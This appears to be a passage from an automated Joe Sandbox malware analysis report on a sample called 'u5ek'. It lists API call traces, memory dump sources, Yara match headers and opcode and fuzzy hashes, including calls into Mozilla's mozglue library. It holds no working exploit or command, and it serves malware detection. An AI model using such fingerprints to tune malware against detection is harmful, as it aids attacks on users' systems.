                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u5ek.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: lstrcpy$AllocLocallstrlenmemcmpmemset
                                                                                                                                                                                                                              • String ID: @$v10
                                                                                                                                                                                                                              • API String ID: 1400469952-24753345
                                                                                                                                                                                                                              • Opcode ID: 0bf8727121b417ca883b6e0e4ab51307295e45311a19dd4b82701fff5f4c4078
                                                                                                                                                                                                                              • Instruction ID: 87859f0eaa1cac66c0422607c8296a2f5b7cfd88fdb957a476e5adb471fb7cf1
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0bf8727121b417ca883b6e0e4ab51307295e45311a19dd4b82701fff5f4c4078
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 00414EB0A00208EBDB04DFA5DC55FDE7B75BF44304F108119F909AB295DB78AE85CB98
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,6BB85820,?), ref: 6BBBD21F
                                                                                                                                                                                                                              • moz_xmalloc.MOZGLUE(00000001,?,?,6BB85820,?), ref: 6BBBD22E
                                                                                                                                                                                                                                • Part of subcall function 6BB8CA10: malloc.MOZGLUE(?), ref: 6BB8CA26
                                                                                                                                                                                                                              • memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,6BB85820,?), ref: 6BBBD242
                                                                                                                                                                                                                              • free.MOZGLUE(00000000,?,?,?,?,?,?,6BB85820,?), ref: 6BBBD253
                                                                                                                                                                                                                                • Part of subcall function 6BB95E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6BB95EDB
                                                                                                                                                                                                                                • Part of subcall function 6BB95E90: memset.VCRUNTIME140(6BBD7765,000000E5,55CCCCCC), ref: 6BB95F27
                                                                                                                                                                                                                                • Part of subcall function 6BB95E90: LeaveCriticalSection.KERNEL32(?), ref: 6BB95FB2
                                                                                                                                                                                                                              • memcpy.VCRUNTIME140(00000000,00000000,?,?,?,?,?,?,?,6BB85820,?), ref: 6BBBD280
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CriticalSectionmemset$EnterLeavefreemallocmemcpymoz_xmallocstrlen
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2029485308-0
                                                                                                                                                                                                                              • Opcode ID: 6b4772be22ae0bc0704e3a4ab8ef81dfdc26c1682f3f91fe08cc8d35356411c8
                                                                                                                                                                                                                              • Instruction ID: 99ce673a4d60203c559c576884ef8e5461943e220bddb03da898c92b8b7ced85
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6b4772be22ae0bc0704e3a4ab8ef81dfdc26c1682f3f91fe08cc8d35356411c8
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B331E5B59406D59BCB00CF68D881A7EBBB5FF89744F244169D9146B301D77AE802CBE1
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6BB8C1BC
                                                                                                                                                                                                                              • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6BB8C1DC
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Now@Stamp@mozilla@@TimeV12@_strlen
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1885715127-0
                                                                                                                                                                                                                              • Opcode ID: a113087e8b4532a44b7abd8ddb94829e55d2b7952a745266a514d1b8cd7724ba
                                                                                                                                                                                                                              • Instruction ID: 6465dd6745fd77d1eb23068b8e2b95bb3012fc2cb401514e25554bf5a1248c64
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a113087e8b4532a44b7abd8ddb94829e55d2b7952a745266a514d1b8cd7724ba
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3F41E4B1D08780CFD710CF28D48175AB7E4FF8A704F408A6DE8889B252E734D948CB92
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • moz_xmalloc.MOZGLUE(00000010,?,6BB742D2), ref: 6BB7436A
                                                                                                                                                                                                                                • Part of subcall function 6BB8CA10: malloc.MOZGLUE(?), ref: 6BB8CA26
                                                                                                                                                                                                                              • memcpy.VCRUNTIME140(00000023,?,?,?,?,6BB742D2), ref: 6BB74387
                                                                                                                                                                                                                              • moz_xmalloc.MOZGLUE(80000023,?,6BB742D2), ref: 6BB743B7
                                                                                                                                                                                                                              • free.MOZGLUE(00000000,?,6BB742D2), ref: 6BB743EF
                                                                                                                                                                                                                              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,6BB742D2), ref: 6BB74406
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: moz_xmalloc$_invalid_parameter_noinfo_noreturnfreemallocmemcpy
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2563754823-0
                                                                                                                                                                                                                              • Opcode ID: be525bfebe424e9f5e0214517eb57e73e870913091e43ac25976f586ceb21d3f
                                                                                                                                                                                                                              • Instruction ID: 64d3ce97a3af17598085a7d5465684818f6515da666ad4be39e4a745fdab7a1e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: be525bfebe424e9f5e0214517eb57e73e870913091e43ac25976f586ceb21d3f
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1D31F772A001958FD724EE789C9056EB7B6EB41365B110B79E83ADB3C4EB34E9008392
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6BBD0BBC
                                                                                                                                                                                                                                • Part of subcall function 6BB95C50: GetTickCount64.KERNEL32 ref: 6BB95D40
                                                                                                                                                                                                                                • Part of subcall function 6BB95C50: EnterCriticalSection.KERNEL32(6BBFF688), ref: 6BB95D67
                                                                                                                                                                                                                              • ?ProcessCreation@TimeStamp@mozilla@@SA?AV12@XZ.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6BBD0BCA
                                                                                                                                                                                                                              • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6BBD0BD5
                                                                                                                                                                                                                                • Part of subcall function 6BB95C50: __aulldiv.LIBCMT ref: 6BB95DB4
                                                                                                                                                                                                                                • Part of subcall function 6BB95C50: LeaveCriticalSection.KERNEL32(6BBFF688), ref: 6BB95DED
                                                                                                                                                                                                                              • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6BBD0BE2
                                                                                                                                                                                                                              • ?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(?,?), ref: 6BBD0C9A
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Time$StampV01@@Value@mozilla@@$CriticalSection$BaseCount64Creation@DurationEnterLeavePlatformProcessSeconds@Stamp@mozilla@@TickUtils@mozilla@@V12@__aulldiv
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3168180809-0
                                                                                                                                                                                                                              • Opcode ID: b4d22f5191660b891f330e39f00fb22886de2fcab5316ffa9df4a1382a117062
                                                                                                                                                                                                                              • Instruction ID: 96bb08911a944f5eff902528011a0f99c05e2684cf7607f5697a02586be11be9
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b4d22f5191660b891f330e39f00fb22886de2fcab5316ffa9df4a1382a117062
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2D31F571D187548BC714DF38989011BB7E8EFC27A0F504B1EF8A5A72D0EBB8D8458B92
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 6BB863D0
                                                                                                                                                                                                                              • AcquireSRWLockExclusive.KERNEL32 ref: 6BB863DF
                                                                                                                                                                                                                              • ReleaseSRWLockExclusive.KERNEL32 ref: 6BB8640E
                                                                                                                                                                                                                              • __Init_thread_footer.LIBCMT ref: 6BB86467
                                                                                                                                                                                                                              • ??$AddMarkerToBuffer@UTextMarker@markers@baseprofiler@mozilla@@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@baseprofiler@mozilla@@YA?AVProfileBufferBlockIndex@1@AAVProfileChunkedBuffer@1@ABV?$ProfilerStringView@D@1@ABVMarkerCategory@1@$$QAVMarkerOptions@1@UTextMarker@markers@01@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z.MOZGLUE ref: 6BB864A8
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Marker$D@std@@ExclusiveLockProfileTextU?$char_traits@V?$allocator@V?$basic_string@$AcquireBlockBufferBuffer@Buffer@1@Category@1@$$ChunkedCurrentD@1@D@2@@std@@@D@2@@std@@@baseprofiler@mozilla@@Index@1@Init_thread_footerMarker@markers@01@Marker@markers@baseprofiler@mozilla@@Options@1@ProfilerReleaseStringThreadView@
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3202982786-0
                                                                                                                                                                                                                              • Opcode ID: f84440b7a4475e84304c61b5439fe13bd117a1abb66f7f9f15c7e2eb81a29fd0
                                                                                                                                                                                                                              • Instruction ID: 46df9f09354bfa45d23eb174682a86f4bb6cf5303a3b0567c8d5d97acdac73cc
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f84440b7a4475e84304c61b5439fe13bd117a1abb66f7f9f15c7e2eb81a29fd0
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 99317CB0809285CFDB00DF68E09566EBBF9FB8A354F15441DD89A83340D739D489CB63
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetSystemTime.KERNEL32(0041D8AC,?,?,004137D1,00000000,?,042EEF50,?,0041D8AC,?,00000000,?), ref: 0041362C
                                                                                                                                                                                                                              • sscanf.NTDLL ref: 00413659
                                                                                                                                                                                                                              • SystemTimeToFileTime.KERNEL32(0041D8AC,00000000,?,?,?,?,?,?,?,?,?,?,?,042EEF50,?,0041D8AC), ref: 00413672
                                                                                                                                                                                                                              • SystemTimeToFileTime.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,042EEF50,?,0041D8AC), ref: 00413680
                                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 0041369A
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u5ek.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Time$System$File$ExitProcesssscanf
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2533653975-0
                                                                                                                                                                                                                              • Opcode ID: 1317ddf1f9c1afdd93909f223843f69075992d328c88535c6b58c76ddc48183c
                                                                                                                                                                                                                              • Instruction ID: a268315634fda69ed0a537ef202e87298384d27024bdd5aae2ec85167a5c17e0
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1317ddf1f9c1afdd93909f223843f69075992d328c88535c6b58c76ddc48183c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6421BA75D14209ABCB14EFE4D945AEEB7BABF4C305F04852EE50AE3250EB345644CB68
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • ??KDecimal@blink@@QBE?AV01@ABV01@@Z.MOZGLUE(?,?), ref: 6BBD9B74
                                                                                                                                                                                                                              • ?ceil@Decimal@blink@@QBE?AV12@XZ.MOZGLUE ref: 6BBD9BBA
                                                                                                                                                                                                                              • ?floor@Decimal@blink@@QBE?AV12@XZ.MOZGLUE ref: 6BBD9BC8
                                                                                                                                                                                                                              • ??DDecimal@blink@@QBE?AV01@ABV01@@Z.MOZGLUE(?,?), ref: 6BBD9BD7
                                                                                                                                                                                                                              • ??GDecimal@blink@@QBE?AV01@ABV01@@Z.MOZGLUE(?,?,?,?), ref: 6BBD9BE0
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Decimal@blink@@$V01@V01@@$V12@$?ceil@?floor@
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2380687156-0
                                                                                                                                                                                                                              • Opcode ID: 46fbf6d5696c148b502540aa13a5a206b6e96e28453bd6f8d09125bd31a6314a
                                                                                                                                                                                                                              • Instruction ID: 1f946146149ca0cc9b82f6679e75cdeba7f4e4d2715da12d8e93dcca8f643e3f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 46fbf6d5696c148b502540aa13a5a206b6e96e28453bd6f8d09125bd31a6314a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BB118232918788ABC710AF788C518AFB7B8FFC6364F005A1DF99947141EB39D544C792
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • __getptd.LIBCMT ref: 004185B3
                                                                                                                                                                                                                                • Part of subcall function 00417B2C: __getptd_noexit.LIBCMT ref: 00417B2F
                                                                                                                                                                                                                                • Part of subcall function 00417B2C: __amsg_exit.LIBCMT ref: 00417B3C
                                                                                                                                                                                                                              • __getptd.LIBCMT ref: 004185CA
                                                                                                                                                                                                                              • __amsg_exit.LIBCMT ref: 004185D8
                                                                                                                                                                                                                              • __lock.LIBCMT ref: 004185E8
                                                                                                                                                                                                                              • __updatetlocinfoEx_nolock.LIBCMT ref: 004185FC
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u5ek.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 938513278-0
                                                                                                                                                                                                                              • Opcode ID: ce05a91ea9c2b8e711ac95fae42e6a284d9b9390d13ac8f67e08820a18d7d66a
                                                                                                                                                                                                                              • Instruction ID: cdd0eec35e4bf80da2317afb9b55000317a90f0185e5a3c9ee5e330d7cc08b67
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ce05a91ea9c2b8e711ac95fae42e6a284d9b9390d13ac8f67e08820a18d7d66a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A4F09632A49710AAD721BBBA9C027CA77B1AF00739F10411FF505A62D2CF6C69C1CA5D
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00413323
                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                              • ShellExecuteEx.SHELL32(0000003C), ref: 004133E6
                                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 00413415
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u5ek.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                                                                                                                                                                                                              • String ID: <
                                                                                                                                                                                                                              • API String ID: 1148417306-4251816714
                                                                                                                                                                                                                              • Opcode ID: 1d4a81d81af302f4c74476254500e49e01b298110368202476dc48bc5823cd56
                                                                                                                                                                                                                              • Instruction ID: 9270ca21e45796c21bf284f368f95b7d0dbf71ea93a5a7258f1c6a627d8bac6b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1d4a81d81af302f4c74476254500e49e01b298110368202476dc48bc5823cd56
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 383144B19012189BDB14EB91DD91FDDBB78AF48304F80518DF20566191DF746B89CF9C
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • LoadLibraryW.KERNEL32(shell32,?,6BBED020), ref: 6BB7F122
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6BB7F132
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                              • String ID: SHGetKnownFolderPath$shell32
                                                                                                                                                                                                                              • API String ID: 2574300362-1045111711
                                                                                                                                                                                                                              • Opcode ID: 258b5372f9d38ee9f00e6975a0e0deb990a157a33d3be97139b3867c6ba2b691
                                                                                                                                                                                                                              • Instruction ID: 3d39b7f68d9104b723d673e54171843c39c32919ce43eeb093b470210598bf13
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 258b5372f9d38ee9f00e6975a0e0deb990a157a33d3be97139b3867c6ba2b691
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B3015E75A002599FCF109F79EC58A6B7BFCEF4A654B400428E959D7200D735EA04CBA0
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00415C1E,00000000), ref: 0041545B
                                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,00415C1E,00000000), ref: 00415462
                                                                                                                                                                                                                              • wsprintfW.USER32 ref: 00415478
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u5ek.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Heap$AllocProcesswsprintf
                                                                                                                                                                                                                              • String ID: %hs
                                                                                                                                                                                                                              • API String ID: 659108358-2783943728
                                                                                                                                                                                                                              • Opcode ID: 9d0e4c61c44ae66937b299eb0154705507e44eb3acdcd074a2a0d5819eeee3b8
                                                                                                                                                                                                                              • Instruction ID: 2a04a3b42468460cff415e79ad4cc7303691da2b1e165ac812b33aed5ccf4e4e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9d0e4c61c44ae66937b299eb0154705507e44eb3acdcd074a2a0d5819eeee3b8
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A5E0ECB5A40608BFDB20DFD4ED0AEAD77A9EB48701F100194F90AD7640DA719E109B95
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
